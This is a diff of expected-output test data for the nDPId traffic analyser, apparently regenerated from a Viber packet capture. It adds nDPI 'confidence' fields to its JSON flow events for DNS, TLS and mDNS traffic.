 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1527155641813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1527155641813,"pkt":"AA6OMNv9MAdNo1+nCABFAABAH5VAAEARmafAqAARwKgAD539ADUALISKl70BAAABAAAAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQAB"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1527155641840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1527155641840,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXElAAEARXIjAqAAPwKgAEQA1nf0Al5UFl72BgAABAAUAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQABwAwABQABAAAGHQAfDmQxZmplOWdtM2QwNXQ4CmNsb3VkZnJvbnQDbmV0AMAwAAEAAQAAADsABDbmXTXAMAABAAEAAAA7AAQ25l1swDAAAQABAAAAOwAENuZdn8AwAAEAAQAAADsABDbmXWM="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"}
-00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00871{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01134{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}}
+00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155644240,"flow_last_seen":1527155644240,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1527155644240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1527155644240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"ts_msec":1527155644240,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0lAAEARXnTAqAARrNkXaqQJAbsAHwH3DO5PoOHayJNED10MJ0pTvsIOJQ7muOI="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1527155644243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"ts_msec":1527155644243,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0pAAEARXnPAqAARrNkXaqQJAbsAH4RqDO5PoOHayJNEEDIopLF1oa8UykhAnf8="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1527155644244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1527155644244,"pkt":"MAdNo1+nAA6OMNv9CABFAAAyAABAADoRu76s2RdqwKgAEQG7pAkAHohoAA5y\/VBeClgsOyCTlKKUc09Z1nXjEg=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1527155646819,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1527155646819,"pkt":"AA6OMNv9MAdNo1+nCABFAABBI8dAAEARlXTAqAARwKgAD4oDADUALaw8\/YcBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1527155646840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1527155646840,"pkt":"MAdNo1+nAA6OMNv9CABFAABRXJhAAEARXJPAqAAPwKgAEQA1igMAPcYV\/YeBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAASsABKzZF04="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"}
-00815{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00869{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00895{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1527155646968,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="}
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_805741c9._sub._googlecast._tcp.local"}}
